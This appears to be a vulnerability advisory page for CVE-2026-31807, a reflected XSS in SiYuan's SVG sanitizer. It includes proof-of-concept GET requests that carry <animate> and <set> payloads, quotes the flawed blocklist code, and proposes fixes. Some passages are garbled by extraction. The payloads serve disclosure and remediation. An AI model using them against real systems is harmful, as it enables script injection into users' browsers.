Deploy autonomous AI agents that reason, exploit, and validate complex vulnerability chains — not another scanner, an agentic system that thinks like a senior pentester.
CVE-2026-31807 is a medium severity vulnerability with a CVSS score of 6.1. Exploits are available; patches have been released and should be applied urgently.
Very low probability of exploitation
EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.
<animate> Element — Unauthenticated XSSSiYuan's SVG sanitizer (SanitizeSVG) blocks dangerous elements (<script>, <iframe>, <foreignobject>) and removes on* event handlers and javascript: in href attributes. However, it does NOT block SVG animation elements (<animate>, <set>) which can dynamically set attributes to dangerous values at runtime, bypassing the static sanitization. This allows an attacker to inject executable JavaScript into the unauthenticated /api/icon/getDynamicIcon endpoint (type=8), creating a reflected XSS.
This is a bypass of the fix for CVE-2026-29183 (fixed in v3.5.9).
kernel/util/misc.goSanitizeSVG() (lines 234-319)GET /api/icon/getDynamicIcon?type=8&content=... (unauthenticated)The sanitizer checks attributes on elements at parse time. SVG <animate> and <set> elements modify attributes at runtime — these elements are not in the sanitizer's blocklist.
if tag == "script" || tag == "iframe" || tag == "object" || tag == "embed" || tag == "foreignobject" {
n.RemoveChild(c)
// ...
}
Missing from blocklist: animate, set, animateTransform, animateMotion
// Only checks static attributes
if strings.HasPrefix(key, "on") {
continue
}
The <animate> element's values attribute contains the payload (), but the sanitizer only checks for prefix, , or keys. The , , , attributes are all passed through.
| Vendor | Product |
|---|---|
| B3log | Siyuan |
Please cite this page when referencing data from Strobes VI. Proper attribution helps support our vulnerability intelligence research.
javascript:...on*hrefxlink:hrefvaluestofromattributeName<animate> sets href to javascript:GET /api/icon/getDynamicIcon?type=8&content=</text><a><animate attributeName="href" values="javascript:alert(document.domain)" begin="0s" fill="freeze"/><text x="50%25" y="80%25" fill="red" style="font-size:60px">Click me</text></a><text>&color=blue
After template rendering, the SVG contains:
<svg ...>
<text ...></text>
<a>
<animate attributeName="href" values="javascript:alert(document.domain)" begin="0s" fill="freeze"/>
<text x="50%" y="80%" fill="red" style="font-size:60px">Click me</text>
</a>
<text></text>
</svg>
The sanitizer passes this through because:
<animate> is not in the element blocklistattributeName="href" — key is attributename, doesn't start with on, not href itselfvalues="javascript:..." — key is values, not hrefWhen the SVG is rendered in the browser (navigating directly to the URL), <animate> sets the parent <a> element's href to javascript:alert(document.domain). Clicking "Click me" triggers the JavaScript.
<set> modifies event handlersGET /api/icon/getDynamicIcon?type=8&content=</text><set attributeName="onmouseover" to="alert(document.domain)"/><text>&color=blue
The <set> element dynamically adds an onmouseover event handler to the parent element at runtime.
getDynamicIcon URL with XSS payloadimage/svg+xml — browser renders as standalone SVG documentAdd animation elements to the sanitizer blocklist:
// In SanitizeSVG, line 250:
if tag == "script" || tag == "iframe" || tag == "object" || tag == "embed" ||
tag == "foreignobject" || tag == "animate" || tag == "set" ||
tag == "animatetransform" || tag == "animatemotion" {
n.RemoveChild(c)
c = next
continue
}
Or additionally check the values, to, and from attributes for javascript: patterns:
if key == "values" || key == "to" || key == "from" {
if strings.Contains(val, "javascript:") {
continue
}
}
Also consider checking attributeName — if it targets href, xlink:href, or any on* attribute, the animation element should be removed entirely.